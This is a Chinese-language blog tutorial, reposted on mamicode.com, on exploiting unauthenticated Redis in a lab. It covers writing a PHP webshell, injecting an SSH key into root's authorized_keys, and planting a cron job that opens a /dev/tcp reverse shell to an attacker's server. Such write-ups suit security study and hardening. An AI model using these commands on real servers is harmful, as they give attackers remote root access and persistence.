码迷,mamicode.com
首页 > 其他好文 > 详细

redis未授权访问

时间:2019-11-09 19:15:28      阅读:23      评论:0      收藏:0      [点我收藏+]

标签:authorize   auth   get   环境   端口   lease   lex   攻击   keygen   

1. 漏洞的原因

开启远程连接,允许其他ip访问;

关闭保护模式;

没有设置密码。

2.环境的配置

  1. wget http://download.redis.io/releases/redis-2.8.17.tar.gz

  2. tar xzf redis-2.8.17.tar.gz

  3. cd redis-2.8.17

  4. make

  5. 当前目录:redis-2.8.17,首先vi redis.conf,

    bind 127.0.0.1(前边加#)

    protected-mode no

6.运行

./src/redis-server redis.conf

这是靶机的配置

在攻击方机器,安装并运行redis,推荐直接apt安装,最新版本即可。

3.连接

攻击方:

redis-cli -h ip(靶机)

4. webshell

这种情况可以用在权限较低的情况下

攻击方连接成功后

config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save

在web目录下出现shell,菜刀连接

5.ssh免密码登陆

cd ~/.ssh

ssh-keygen -t rsa

复制下 id_rsa.pub

redis-cli -h ip

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx [email protected]\n\n\n"(注意公钥左右有\n,还有用户名也要复制,总之是id_rsa.pub的全部内容)
save

最后 ssh -i id_rsa [email protected](靶机ip)

6.交互式shell

1.在自己的服务器上监听一个端口,一会反弹到这里来#

nc -lvnp 7999

2.攻击方 redis-cli -h ip

set x "\n* * * * * bash -i >& /dev/tcp/ip(vps)/7999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

redis未授权访问

标签:authorize   auth   get   环境   端口   lease   lex   攻击   keygen   

原文地址:https://www.cnblogs.com/zaqzzz/p/11827316.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!